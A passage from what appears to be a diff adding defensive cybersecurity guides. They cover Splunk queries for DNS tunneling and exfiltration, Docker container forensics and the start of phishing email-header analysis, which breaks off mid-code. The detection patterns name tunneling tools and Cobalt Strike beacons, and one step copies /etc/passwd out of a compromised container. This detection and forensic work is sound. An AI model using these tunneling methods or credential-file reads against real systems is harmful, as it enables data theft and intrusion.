| where high_entropy_queries > 50
|
||||
| sort - high_entropy_queries
|
||||
```
|
||||
|
||||
### Step 3: Detect Anomalous DNS Query Volume
|
||||
|
||||
Identify hosts generating abnormal DNS traffic:
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns" earliest=-24h
|
||||
| bin _time span=1h
|
||||
| stats count AS queries, dc(query) AS unique_domains by src_ip, _time
|
||||
| eventstats avg(queries) AS avg_queries, stdev(queries) AS stdev_queries by src_ip
|
||||
| eval z_score = if(stdev_queries > 0, (queries - avg_queries) / stdev_queries, 0)
|
||||
| where z_score > 3 OR queries > 5000
|
||||
| sort - z_score
|
||||
| table _time, src_ip, queries, unique_domains, avg_queries, z_score
|
||||
```
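The z-score logic is easy to sanity-check outside the SIEM. The sketch below mirrors the search for a single host, using the sample standard deviation (which is what SPL's `stdev` computes) and skipping hosts whose counts never vary; `zscore_outliers` and the sample counts are illustrative.

```python
import statistics
from typing import List, Tuple


def zscore_outliers(
    hourly_counts: List[int], threshold: float = 3.0
) -> List[Tuple[int, int, float]]:
    """Return (hour_index, count, z_score) for hours above the threshold."""
    if len(hourly_counts) < 2:
        return []                            # stdev needs two or more samples
    mean = statistics.mean(hourly_counts)
    stdev = statistics.stdev(hourly_counts)  # sample standard deviation
    if stdev == 0:
        return []                            # flat baseline: z-score undefined
    outliers = []
    for hour, count in enumerate(hourly_counts):
        z = (count - mean) / stdev
        if z > threshold:
            outliers.append((hour, count, round(z, 2)))
    return outliers


if __name__ == "__main__":
    # 23 quiet hours followed by one burst (synthetic numbers).
    counts = [100] * 23 + [5000]
    print(zscore_outliers(counts))
```

Because the spike itself is part of the baseline, a z-score computed over 24 hourly buckets cannot exceed (24 - 1) / sqrt(24), about 4.69, so a longer baseline window gives the threshold more headroom.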
|
||||
|
||||
**Detect TXT record abuse (common tunneling method):**
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns" query_type="TXT"
|
||||
| stats count AS txt_queries, dc(query) AS unique_txt_domains,
|
||||
values(query) AS domains by src_ip
|
||||
| where txt_queries > 100
|
||||
| eval suspicion = case(
|
||||
txt_queries > 1000, "CRITICAL — Likely DNS tunneling",
|
||||
txt_queries > 500, "HIGH — Possible DNS tunneling",
|
||||
txt_queries > 100, "MEDIUM — Unusual TXT volume"
|
||||
)
|
||||
| sort - txt_queries
|
||||
| table src_ip, txt_queries, unique_txt_domains, suspicion
|
||||
```
|
||||
|
||||
### Step 4: Detect Known DNS Tunneling Tools
|
||||
|
||||
Search for signatures of common DNS tunneling tools:
|
||||
|
||||
```spl
|
||||
index=dns sourcetype="stream:dns"
|
||||
| eval query_lower = lower(query)
|
||||
| where (
|
||||
match(query_lower, "\.dnscat\.") OR
|
||||
match(query_lower, "\.dns2tcp\.") OR
|
||||
match(query_lower, "\.iodine\.") OR
|
||||
match(query_lower, "\.dnscapy\.") OR
|
||||
match(query_lower, "\.cobalt.*\.beacon") OR
|
||||
query_type="NULL" OR
|
||||
(query_type="TXT" AND len(query) > 100)
|
||||
)
|
||||
| stats count by src_ip, query, query_type
|
||||
| sort - count
|
||||
```
|
||||
|
||||
**Detect DNS over HTTPS (DoH) bypassing local DNS:**
|
||||
|
||||
```spl
|
||||
index=proxy OR index=firewall
|
||||
dest IN ("1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4",
|
||||
"9.9.9.9", "149.112.112.112", "208.67.222.222")
|
||||
dest_port=443
|
||||
| stats sum(bytes_out) AS total_bytes, count AS connections by src_ip, dest
|
||||
| where connections > 100 OR total_bytes > 10485760
|
||||
| eval alert = "Possible DoH bypass — DNS queries sent over HTTPS to public resolver"
|
||||
| sort - total_bytes
|
||||
```
|
||||
|
||||
### Step 5: Correlate DNS Findings with Endpoint Data
|
||||
|
||||
Cross-reference suspicious DNS with process data:
|
||||
|
||||
```spl
|
||||
index=dns src_ip="192.168.1.105" query="*.evil-tunnel.com" earliest=-24h
|
||||
| stats count AS dns_queries, earliest(_time) AS first_query, latest(_time) AS last_query
|
||||
by src_ip, query
|
||||
| join src_ip [
|
||||
search index=sysmon EventCode=3 DestinationPort=53 Computer="WORKSTATION-042"
|
||||
| stats count AS connections, values(Image) AS processes by SourceIp
|
||||
| rename SourceIp AS src_ip
|
||||
]
|
||||
| table src_ip, query, dns_queries, first_query, last_query, processes
|
||||
```
|
||||
|
||||
### Step 6: Calculate Data Exfiltration Volume Estimate
|
||||
|
||||
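Estimate the data volume encoded in DNS query names. The 0.75 factor assumes the leftmost label is Base64-encoded (4 characters carry 3 bytes), and only that label is counted, so multi-label encodings are underestimated: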
|
||||
|
||||
```spl
|
||||
index=dns src_ip="192.168.1.105" query="*.evil-tunnel.com" earliest=-24h
|
||||
| eval domain_parts = split(query, ".")
|
||||
| eval encoded_data = mvindex(domain_parts, 0)
|
||||
| eval encoded_bytes = len(encoded_data)
|
||||
| eval decoded_bytes = encoded_bytes * 0.75
|
||||
| stats sum(decoded_bytes) AS total_bytes_estimated, count AS total_queries,
|
||||
earliest(_time) AS first_seen, latest(_time) AS last_seen
|
||||
| eval estimated_kb = round(total_bytes_estimated / 1024, 1)
|
||||
| eval estimated_mb = round(total_bytes_estimated / 1048576, 2)
|
||||
| eval duration_hours = round((last_seen - first_seen) / 3600, 1)
|
||||
| eval rate_kbps = round(estimated_kb / (duration_hours * 3600) * 8, 2)
|
||||
| table total_queries, estimated_mb, duration_hours, rate_kbps, first_seen, last_seen
|
||||
```
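
The arithmetic in the query above can be checked offline with a small Python sketch. The function name `estimate_exfil` and the sample labels are hypothetical; the 0.75 factor and the kilobits-per-second conversion mirror the SPL, and the zero-duration guard is an addition for the single-query case.

```python
def estimate_exfil(labels, duration_seconds):
    """Estimate decoded bytes and average rate for Base64-encoded leftmost labels."""
    # Base64 carries 3 bytes in every 4 characters, hence the 0.75 factor
    total_bytes = sum(len(label) * 0.75 for label in labels)
    kilobytes = total_bytes / 1024
    # Avoid dividing by zero when first and last query share a timestamp
    rate_kbps = (kilobytes * 8 / duration_seconds) if duration_seconds > 0 else 0.0
    return total_bytes, round(rate_kbps, 2)


# Hypothetical sample: 1,000 queries with a 60-character encoded label over one hour
total, rate = estimate_exfil(["A" * 60] * 1000, 3600)
print(f"{total:.0f} bytes, {rate} kbps")
```

Hex-encoded tunnels would need a factor of 0.5 instead, so the encoding should be confirmed from a few sample queries before the estimate goes into a report.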
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|-----------|
|
||||
| **DNS Tunneling** | Technique encoding data within DNS queries/responses to exfiltrate data or establish C2 channels through DNS |
|
||||
| **DGA** | Domain Generation Algorithm — malware technique generating pseudo-random domain names for C2 resilience |
|
||||
| **Shannon Entropy** | Mathematical measure of randomness in a string, in bits per character; high entropy (above roughly 3.5) in domain labels suggests DGA or tunneling and should be confirmed against other indicators |
|
||||
| **TXT Record Abuse** | Using DNS TXT records (designed for text data) as a high-bandwidth channel for data tunneling |
|
||||
| **DNS over HTTPS (DoH)** | DNS queries encrypted over HTTPS (port 443), bypassing traditional DNS monitoring |
|
||||
| **Passive DNS** | Historical record of DNS resolutions showing which IPs a domain resolved to over time |
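
For reference, the Shannon entropy figure used throughout this skill can be computed as in the sketch below. The helper name `shannon_entropy` is illustrative, and the 3.5 threshold is the one quoted in the table rather than a universal constant.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Return the Shannon entropy of a string in bits per character."""
    if not text:
        return 0.0
    counts = Counter(text)
    length = len(text)
    # H = -sum(p * log2(p)) over the observed character frequencies
    return -sum((n / length) * math.log2(n / length) for n in counts.values())


print(shannon_entropy("aaaa"))  # a single repeated character carries no information
print(shannon_entropy("abcd"))  # four equally likely characters
```

A label of length n can never exceed log2(n) bits per character, so very short labels cannot cross the threshold no matter how random they are; combining entropy with label length avoids that blind spot.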
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Splunk Stream**: Network traffic capture add-on providing parsed DNS query data for SIEM analysis
|
||||
- **Zeek (Bro)**: Network security monitor generating detailed DNS transaction logs for analysis
|
||||
- **Cisco Umbrella (OpenDNS)**: Cloud DNS security platform blocking malicious domains and logging query data
|
||||
- **Infoblox DNS Firewall**: DNS-layer security providing RPZ-based blocking and detailed query logging
|
||||
- **Farsight DNSDB**: Passive DNS database for historical domain resolution lookups and infrastructure mapping
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
- **Cobalt Strike DNS Beacon**: Detect periodic TXT queries with encoded payloads to C2 domain
|
||||
- **Data Exfiltration**: Large volumes of unique subdomain queries encoding stolen data in Base64/hex
|
||||
- **DGA Malware**: Detect DNS queries to algorithmically generated domains (high entropy, no web content)
|
||||
- **DNS-over-HTTPS Bypass**: Employee using DoH to bypass corporate DNS filtering and monitoring
|
||||
- **Slow Drip Exfiltration**: Low-volume DNS tunneling staying below threshold alerts (requires baseline comparison)
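
The baseline comparison mentioned for slow drip exfiltration could be sketched as a simple z-score test on per-host daily query counts. The function name, the sample history, and the threshold of 3 standard deviations are assumptions for illustration, not values taken from this skill.

```python
from statistics import mean, pstdev


def is_anomalous(history, today, z_threshold=3.0):
    """Flag today's count if it sits far above the host's own historical baseline."""
    baseline = mean(history)
    spread = pstdev(history)
    if spread == 0:
        # A perfectly flat history: any increase is a deviation
        return today > baseline
    return (today - baseline) / spread > z_threshold


# Hypothetical daily TXT query counts for one workstation
history = [100, 110, 90, 105, 95]
print(is_anomalous(history, 400))
print(is_anomalous(history, 104))
```

A per-host baseline matters here because a fixed threshold such as 100 TXT queries is easy for a patient attacker to stay under.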
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
DNS EXFILTRATION ANALYSIS — WORKSTATION-042
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
Period: 2024-03-14 to 2024-03-15
|
||||
Source: 192.168.1.105 (WORKSTATION-042, Finance Dept)
|
||||
|
||||
Findings:
|
||||
[CRITICAL] DNS tunneling detected to evil-tunnel[.]com
|
||||
Query Volume: 12,847 queries in 18 hours
|
||||
Avg Subdomain Len: 63 characters (normal: <20)
|
||||
Avg Entropy: 3.82 (threshold: 3.5)
|
||||
Query Types: TXT (89%), A (11%)
|
||||
Estimated Data: ~4.7 MB exfiltrated via DNS
|
||||
Rate: 0.58 kbps (slow drip pattern)
|
||||
|
||||
[HIGH] DGA-like domains resolved
|
||||
Unique DGA Domains: 247 domains resolved
|
||||
Pattern: 15-char random alphanumeric.xyz TLD
|
||||
Entropy Range: 3.6 - 4.1
|
||||
|
||||
Process Attribution:
|
||||
Process: svchost_update.exe (masquerading — not legitimate svchost)
|
||||
PID: 4892
|
||||
Parent: explorer.exe
|
||||
Hash: SHA256: a1b2c3d4... (VT: 34/72 malicious — Cobalt Strike beacon)
|
||||
|
||||
Containment:
|
||||
[DONE] Host isolated via EDR
|
||||
[DONE] Domain evil-tunnel[.]com added to DNS sinkhole
|
||||
[DONE] Incident IR-2024-0448 created
|
||||
```
|
||||
@@ -0,0 +1,329 @@
|
||||
---
|
||||
name: analyzing-docker-container-forensics
|
||||
description: Investigate compromised Docker containers by analyzing images, layers, volumes, logs, and runtime artifacts to identify malicious activity and evidence.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, docker, container-forensics, container-security, image-analysis, runtime-investigation]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Docker Container Forensics
|
||||
|
||||
## When to Use
|
||||
- When investigating a compromised Docker container or container host
|
||||
- For analyzing malicious Docker images pulled from registries
|
||||
- During incident response involving containerized application breaches
|
||||
- When examining container escape attempts or privilege escalation
|
||||
- For auditing container configurations and identifying misconfigurations
|
||||
|
||||
## Prerequisites
|
||||
- Docker CLI access on the forensic workstation
|
||||
- Access to the Docker host file system (forensic image or live)
|
||||
- Understanding of Docker layered file system (overlay2, aufs)
|
||||
- dive, docker-explorer, or container-diff for image analysis
|
||||
- Knowledge of Docker daemon configuration and socket security
|
||||
- Trivy or Grype for vulnerability scanning of container images
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Preserve Container State and Evidence
|
||||
|
||||
```bash
|
||||
# List all containers (including stopped)
|
||||
docker ps -a --no-trunc > /cases/case-2024-001/docker/container_list.txt
|
||||
|
||||
# Inspect the compromised container
|
||||
CONTAINER_ID="abc123def456"
|
||||
docker inspect $CONTAINER_ID > /cases/case-2024-001/docker/container_inspect.json
|
||||
|
||||
# Export container filesystem as tarball (preserves current state)
|
||||
docker export $CONTAINER_ID > /cases/case-2024-001/docker/container_export.tar
|
||||
|
||||
# Create an image from the container's current state
|
||||
docker commit $CONTAINER_ID forensic-evidence:case-2024-001
|
||||
docker save forensic-evidence:case-2024-001 > /cases/case-2024-001/docker/container_image.tar
|
||||
|
||||
# Capture container logs
|
||||
docker logs $CONTAINER_ID --timestamps > /cases/case-2024-001/docker/container_logs.txt 2>&1
|
||||
|
||||
# Capture running processes (if container is still running)
|
||||
docker top $CONTAINER_ID > /cases/case-2024-001/docker/container_processes.txt
|
||||
|
||||
# Capture network connections
|
||||
docker exec $CONTAINER_ID netstat -tunap 2>/dev/null > /cases/case-2024-001/docker/container_network.txt
|
||||
|
||||
# Copy specific files from the container
|
||||
docker cp $CONTAINER_ID:/var/log/ /cases/case-2024-001/docker/container_var_log/
|
||||
docker cp $CONTAINER_ID:/tmp/ /cases/case-2024-001/docker/container_tmp/
|
||||
docker cp $CONTAINER_ID:/etc/passwd /cases/case-2024-001/docker/container_passwd
|
||||
|
||||
# Hash all exported evidence
|
||||
sha256sum /cases/case-2024-001/docker/*.tar > /cases/case-2024-001/docker/evidence_hashes.txt
|
||||
```
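
The `sha256sum` call above covers only the `.tar` files. A minimal sketch for hashing every file under the evidence directory, including the copied log and `/tmp` trees, might look like this; `sha256_file` and `hash_tree` are hypothetical helper names.

```python
import hashlib
from pathlib import Path


def sha256_file(path, chunk_size=1024 * 1024):
    """Hash a file in chunks so large tarballs do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_tree(root):
    """Return {relative path: SHA-256} for every regular file below root."""
    root = Path(root)
    return {
        str(path.relative_to(root)): sha256_file(path)
        for path in sorted(root.rglob("*"))
        if path.is_file()
    }
```

Calling `hash_tree("/cases/case-2024-001/docker")` and writing the result next to `evidence_hashes.txt` would give a manifest that can be re-checked before analysis and again before reporting.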
|
||||
|
||||
### Step 2: Analyze Container Image Layers
|
||||
|
||||
```bash
|
||||
# Install dive for image layer analysis
|
||||
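# Release assets carry the version in the file name, so resolve the latest tag first
DIVE_VERSION=$(curl -sL "https://api.github.com/repos/wagoodman/dive/releases/latest" | grep '"tag_name":' | sed -E 's/.*"v([^"]+)".*/\1/')
wget "https://github.com/wagoodman/dive/releases/download/v${DIVE_VERSION}/dive_${DIVE_VERSION}_linux_amd64.deb"
sudo dpkg -i "dive_${DIVE_VERSION}_linux_amd64.deb"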
|
||||
|
||||
# Analyze image layers interactively
|
||||
dive forensic-evidence:case-2024-001
|
||||
|
||||
# Non-interactive layer analysis
|
||||
dive forensic-evidence:case-2024-001 --ci --json /cases/case-2024-001/docker/dive_analysis.json
|
||||
|
||||
# Extract and examine individual layers
|
||||
mkdir -p /cases/case-2024-001/docker/layers/
|
||||
tar -xf /cases/case-2024-001/docker/container_image.tar -C /cases/case-2024-001/docker/layers/
|
||||
|
||||
# List the image manifest and layer order
|
||||
cat /cases/case-2024-001/docker/layers/manifest.json | python3 -m json.tool
|
||||
|
||||
# Examine each layer for changes
|
||||
for layer in /cases/case-2024-001/docker/layers/*/layer.tar; do
|
||||
echo "=== Layer: $(dirname $layer | xargs basename) ==="
|
||||
tar -tf "$layer" | head -20
|
||||
echo "..."
|
||||
done
|
||||
|
||||
# Use container-diff to compare with original base image
|
||||
# Install container-diff
|
||||
curl -LO https://storage.googleapis.com/container-diff/latest/container-diff-linux-amd64
|
||||
chmod +x container-diff-linux-amd64
|
||||
|
||||
# Compare committed image with original
|
||||
./container-diff-linux-amd64 diff daemon://nginx:latest daemon://forensic-evidence:case-2024-001 \
|
||||
--type=file --type=apt --type=history --json \
|
||||
> /cases/case-2024-001/docker/container_diff.json
|
||||
```
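
The layer order can also be read straight from the `docker save` archive without extracting it. The sketch below assumes the archive contains a top-level `manifest.json` with `RepoTags` and `Layers` entries; `list_layers` is a hypothetical helper name.

```python
import json
import tarfile


def list_layers(image_tar_path):
    """Return (repo tags, ordered layer paths) for each image in a docker save archive."""
    with tarfile.open(image_tar_path) as archive:
        manifest = json.load(archive.extractfile("manifest.json"))
    # Layers are listed bottom-up: the first entry is the base layer
    return [(entry.get("RepoTags"), entry.get("Layers", [])) for entry in manifest]
```

Reading the layer paths from the manifest is more robust than globbing for `*/layer.tar`, because newer Docker releases may store layers under a different directory layout inside the archive.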
|
||||
|
||||
### Step 3: Examine Docker Host Artifacts
|
||||
|
||||
```bash
|
||||
# Docker data directory (default: /var/lib/docker/)
|
||||
DOCKER_ROOT="/mnt/evidence/var/lib/docker"
|
||||
|
||||
# Examine overlay2 filesystem layers
|
||||
ls -la $DOCKER_ROOT/overlay2/
|
||||
|
||||
# Find the container's merged filesystem
|
||||
MERGED_DIR=$(docker inspect $CONTAINER_ID --format '{{.GraphDriver.Data.MergedDir}}' 2>/dev/null)
|
||||
# Or manually from forensic image:
|
||||
# Look in /var/lib/docker/containers/<container_id>/config.v2.json
|
||||
|
||||
# Analyze container configuration files
# (directories under containers/ use the full 64-character ID, so glob on the short ID)
cat $DOCKER_ROOT/containers/${CONTAINER_ID}*/config.v2.json | python3 -m json.tool \
|
||||
> /cases/case-2024-001/docker/container_config.json
|
||||
|
||||
# Check Docker daemon configuration
|
||||
cat /mnt/evidence/etc/docker/daemon.json 2>/dev/null > /cases/case-2024-001/docker/daemon_config.json
|
||||
|
||||
# Collect the container's json-file logs (stdout/stderr as recorded by the daemon)
cat $DOCKER_ROOT/containers/${CONTAINER_ID}*/*.log > /cases/case-2024-001/docker/container_json_logs.txt
|
||||
|
||||
# Check for volume mounts (potential host filesystem access)
|
||||
python3 << 'PYEOF'
import json

with open('/cases/case-2024-001/docker/container_inspect.json') as f:
    data = json.load(f)

inspect = data[0] if isinstance(data, list) else data

print("=== CONTAINER SECURITY ANALYSIS ===\n")

# Check mounts (the Docker socket is included because mounting it grants control of the daemon)
print("Volume Mounts:")
sensitive_paths = ('/', '/etc', '/var', '/root', '/var/run/docker.sock')
for mount in inspect.get('Mounts') or []:
    rw = "READ-WRITE" if mount.get('RW') else "READ-ONLY"
    print(f"  {mount.get('Source', 'N/A')} -> {mount.get('Destination', 'N/A')} ({rw})")
    if mount.get('Source') in sensitive_paths and mount.get('RW'):
        print("    WARNING: Sensitive host path mounted read-write!")

# Check privileged mode
host_config = inspect.get('HostConfig', {})
if host_config.get('Privileged'):
    print("\nWARNING: Container was running in PRIVILEGED mode!")

# Check capabilities (CapAdd is null when nothing was added)
cap_add = host_config.get('CapAdd') or []
if cap_add:
    print(f"\nAdded Capabilities: {cap_add}")
    dangerous_caps = ['SYS_ADMIN', 'SYS_PTRACE', 'NET_ADMIN', 'SYS_MODULE']
    for cap in cap_add:
        if cap in dangerous_caps:
            print(f"  WARNING: Dangerous capability: {cap}")

# Check PID namespace
if host_config.get('PidMode') == 'host':
    print("\nWARNING: Container shares host PID namespace!")

# Check network mode
if host_config.get('NetworkMode') == 'host':
    print("\nWARNING: Container shares host network namespace!")

# Check user (an empty User field means the image default, normally root)
user = inspect.get('Config', {}).get('User') or 'root (default)'
print(f"\nRunning as user: {user}")

# Check environment variables for secrets
env_vars = inspect.get('Config', {}).get('Env') or []
print(f"\nEnvironment Variables: {len(env_vars)}")
for env in env_vars:
    key = env.split('=')[0]
    if any(s in key.upper() for s in ['PASSWORD', 'SECRET', 'KEY', 'TOKEN', 'CREDENTIAL']):
        print(f"  SENSITIVE: {key}=***REDACTED***")
PYEOF
|
||||
```
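
The json-file logs collected in this step hold one JSON object per line. A minimal parsing sketch follows, assuming the container used Docker's default `json-file` logging driver with its `log`, `stream`, and `time` keys; `parse_json_log_lines` and the sample lines are hypothetical.

```python
import json


def parse_json_log_lines(lines):
    """Turn json-file log lines into (time, stream, message) tuples, skipping damaged lines."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or corrupted line, common on carved evidence
        events.append((record.get("time"), record.get("stream"), record.get("log", "").rstrip("\n")))
    return events


# Hypothetical sample lines for illustration only
sample = [
    '{"log":"GET /index.php\\n","stream":"stdout","time":"2024-01-10T09:00:01.000000000Z"}',
    '{"log":"sh: 1: curl: not found\\n","stream":"stderr","time":"2024-01-10T09:00:02.000000000Z"}',
    '{"log":"trunca',
]
for event in parse_json_log_lines(sample):
    print(event)
```

Entries on `stderr` are often the quickest way to spot failed attacker commands, since legitimate services rarely emit shell errors.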
|
||||
|
||||
### Step 4: Analyze Container File System Changes
|
||||
|
||||
```bash
|
||||
# Compare container filesystem to original image
|
||||
docker diff $CONTAINER_ID > /cases/case-2024-001/docker/filesystem_changes.txt
|
||||
|
||||
# A = Added, C = Changed, D = Deleted
|
||||
# Analyze changes
|
||||
python3 << 'PYEOF'
added = []
changed = []
deleted = []

with open('/cases/case-2024-001/docker/filesystem_changes.txt') as f:
    for line in f:
        line = line.strip()
        if line.startswith('A '):
            added.append(line[2:])
        elif line.startswith('C '):
            changed.append(line[2:])
        elif line.startswith('D '):
            deleted.append(line[2:])

print(f"Files Added: {len(added)}")
print(f"Files Changed: {len(changed)}")
print(f"Files Deleted: {len(deleted)}")

# Flag suspicious additions
suspicious = [f for f in added if any(s in f for s in
    ['/tmp/', '/dev/shm/', '/root/', '.sh', '.py', '.elf', 'reverse', 'shell', 'backdoor'])]
if suspicious:
    print("\nSuspicious Added Files:")
    for f in suspicious:
        print(f"  {f}")

# Flag suspicious changes
sus_changed = [f for f in changed if any(s in f for s in
    ['/etc/passwd', '/etc/shadow', '/etc/crontab', '/etc/ssh', '.bashrc'])]
if sus_changed:
    print("\nSuspicious Changed Files:")
    for f in sus_changed:
        print(f"  {f}")
PYEOF
|
||||
|
||||
# Extract and examine the container export
|
||||
mkdir -p /cases/case-2024-001/docker/container_fs/
|
||||
tar -xf /cases/case-2024-001/docker/container_export.tar -C /cases/case-2024-001/docker/container_fs/
|
||||
|
||||
# Scan for webshells and malicious files
|
||||
find /cases/case-2024-001/docker/container_fs/tmp/ -type f -exec file {} \;
|
||||
find /cases/case-2024-001/docker/container_fs/ -name "*.php" -newer /cases/case-2024-001/docker/container_fs/etc/hostname
|
||||
```
|
||||
|
||||
### Step 5: Scan for Vulnerabilities and Generate Report
|
||||
|
||||
```bash
|
||||
# Scan the image for known vulnerabilities
|
||||
trivy image forensic-evidence:case-2024-001 \
|
||||
--format json \
|
||||
--output /cases/case-2024-001/docker/vulnerability_scan.json
|
||||
|
||||
# Scan the exported filesystem
|
||||
trivy fs /cases/case-2024-001/docker/container_fs/ \
|
||||
--format table \
|
||||
--output /cases/case-2024-001/docker/fs_vulnerabilities.txt
|
||||
|
||||
# Check for secrets in the image
|
||||
trivy image forensic-evidence:case-2024-001 \
|
||||
--scanners secret \
|
||||
--format json \
|
||||
--output /cases/case-2024-001/docker/secrets_scan.json
|
||||
```
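
To fill in the severity totals for the report, the Trivy JSON output can be summarized with a short sketch like the one below. It assumes the report has a top-level `Results` list whose entries may carry a `Vulnerabilities` list with a `Severity` field; `severity_counts` and the placeholder IDs are hypothetical.

```python
from collections import Counter


def severity_counts(report):
    """Count findings per severity across all targets in a Trivy JSON report."""
    counts = Counter()
    for result in report.get("Results") or []:
        # Targets without findings omit the key or set it to null
        for vuln in result.get("Vulnerabilities") or []:
            counts[vuln.get("Severity", "UNKNOWN")] += 1
    return counts


# Placeholder report for illustration; the IDs are not real CVEs
report = {
    "Results": [
        {"Target": "image (debian)", "Vulnerabilities": [
            {"VulnerabilityID": "CVE-0000-0001", "Severity": "CRITICAL"},
            {"VulnerabilityID": "CVE-0000-0002", "Severity": "HIGH"},
        ]},
        {"Target": "app/package-lock.json", "Vulnerabilities": None},
    ]
}
print(dict(severity_counts(report)))
```

In practice the `report` dictionary would come from `json.load` on `vulnerability_scan.json`.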
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| Image layers | Read-only filesystem layers stacked to form the container image |
|
||||
| overlay2 | Default Docker storage driver using union filesystem for layers |
|
||||
| Container diff | Comparison of runtime filesystem changes against the original image |
|
||||
| Privileged mode | Container with full host capabilities (bypasses most isolation) |
|
||||
| Docker socket | Unix socket (/var/run/docker.sock) controlling the Docker daemon |
|
||||
| Container escape | Technique for breaking out of container isolation to the host |
|
||||
| Volume mounts | Host filesystem paths made accessible inside the container |
|
||||
| Image history | Record of Dockerfile instructions used to build each layer |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| docker inspect | Detailed container configuration and state information |
|
||||
| docker diff | Show filesystem changes made in a running/stopped container |
|
||||
| dive | Interactive Docker image layer analysis tool |
|
||||
| container-diff | Google tool for comparing container image contents |
|
||||
| Trivy | Vulnerability scanner for container images and filesystems |
|
||||
| docker-explorer | Forensic tool for offline Docker artifact analysis |
|
||||
| Sysdig | Container runtime security monitoring and forensics |
|
||||
| Falco | Runtime threat detection for containers and Kubernetes |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Web Application Container Compromise**
|
||||
Export the container filesystem, identify webshells in web root, analyze access logs for exploitation attempts, check for added files and modified configurations, examine network connections for C2 communication, review container capabilities for escalation paths.
|
||||
|
||||
**Scenario 2: Supply Chain Attack via Malicious Image**
|
||||
Analyze image layers with dive to identify which layer added malicious content, compare with the official base image using container-diff, check image history for suspicious RUN commands, scan for embedded backdoors and cryptocurrency miners, trace the image pull from registry logs.
|
||||
|
||||
**Scenario 3: Container Escape Investigation**
|
||||
Check if container ran privileged or with dangerous capabilities, examine host filesystem mount points for unauthorized access, review Docker socket mount enabling Docker-in-Docker abuse, analyze host system logs for container escape indicators, check for kernel exploit artifacts.
|
||||
|
||||
**Scenario 4: Cryptojacking in Container Environment**
|
||||
Identify high-CPU containers, export and analyze the container image for mining binaries, check for unauthorized images in the registry, review container creation events for rogue deployments, examine network connections for mining pool communications.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Docker Container Forensics Summary:
|
||||
Container: abc123def456 (nginx-app)
|
||||
Image: company/web-app:v2.1
|
||||
Status: Running (started 2024-01-10 09:00 UTC)
|
||||
Host: docker-host-01.corp.local
|
||||
|
||||
Security Configuration:
|
||||
Privileged: No
|
||||
Capabilities Added: NET_ADMIN (WARNING)
|
||||
Volume Mounts: /var/log -> /host-logs (RW)
|
||||
Network Mode: bridge
|
||||
User: root (WARNING)
|
||||
|
||||
Filesystem Changes:
|
||||
Added: 23 files (5 suspicious)
|
||||
Changed: 12 files (2 suspicious)
|
||||
Deleted: 0 files
|
||||
|
||||
Suspicious Findings:
|
||||
/tmp/reverse.sh - Reverse shell script (Added)
|
||||
/var/www/html/.hidden/shell.php - PHP webshell (Added)
|
||||
/etc/crontab - Modified (persistence cron entry added)
|
||||
/root/.ssh/authorized_keys - Modified (unauthorized key added)
|
||||
|
||||
Vulnerability Scan:
|
||||
Critical: 3 (CVE-2024-xxxx in base image)
|
||||
High: 12
|
||||
Medium: 34
|
||||
|
||||
Evidence: /cases/case-2024-001/docker/
|
||||
```
|
||||
@@ -0,0 +1,312 @@
|
||||
---
|
||||
name: analyzing-email-headers-for-phishing-investigation
|
||||
description: Parse and analyze email headers to trace the origin of phishing emails, verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, email-analysis, phishing, spf, dkim, dmarc, header-analysis]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Email Headers for Phishing Investigation
|
||||
|
||||
## When to Use
|
||||
- When investigating a suspected phishing email to determine its true origin
|
||||
- For verifying sender authenticity and detecting email spoofing
|
||||
- During incident response when a user has clicked a phishing link
|
||||
- When tracing the delivery path and relay servers of a suspicious email
|
||||
- For validating SPF, DKIM, and DMARC alignment to identify forgery
|
||||
|
||||
## Prerequisites
|
||||
- Raw email headers from the suspicious message (EML or MSG format)
|
||||
- Understanding of SMTP protocol and email header fields
|
||||
- Access to DNS lookup tools (dig, nslookup) for SPF/DKIM/DMARC verification
|
||||
- Email header analysis tools (e.g., Microsoft Message Header Analyzer (MHA), emailheaders.net)
|
||||
- Python with email parsing libraries for automated analysis
|
||||
- Access to threat intelligence platforms for IP/domain reputation
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Extract Raw Email Headers
|
||||
|
||||
```bash
|
||||
# Export from Outlook: Open email > File > Properties > Internet Headers
|
||||
# Export from Gmail: Open email > Three dots > Show original
|
||||
# Export from Thunderbird: View > Message Source
|
||||
|
||||
# If working with EML file from forensic image
|
||||
cp /mnt/evidence/Users/suspect/AppData/Local/Microsoft/Outlook/phishing_email.eml \
|
||||
/cases/case-2024-001/email/
|
||||
|
||||
# If working with PST file, extract individual messages
|
||||
pip install libpff-python  # provides the pypff module
python3 << 'PYEOF'
import itertools
import re

import pypff

pst = pypff.file()
pst.open("/cases/case-2024-001/email/outlook.pst")
root = pst.get_root_folder()
counter = itertools.count()

def extract_messages(folder):
    for i in range(folder.get_number_of_sub_messages()):
        msg = folder.get_sub_message(i)
        headers = msg.get_transport_headers()
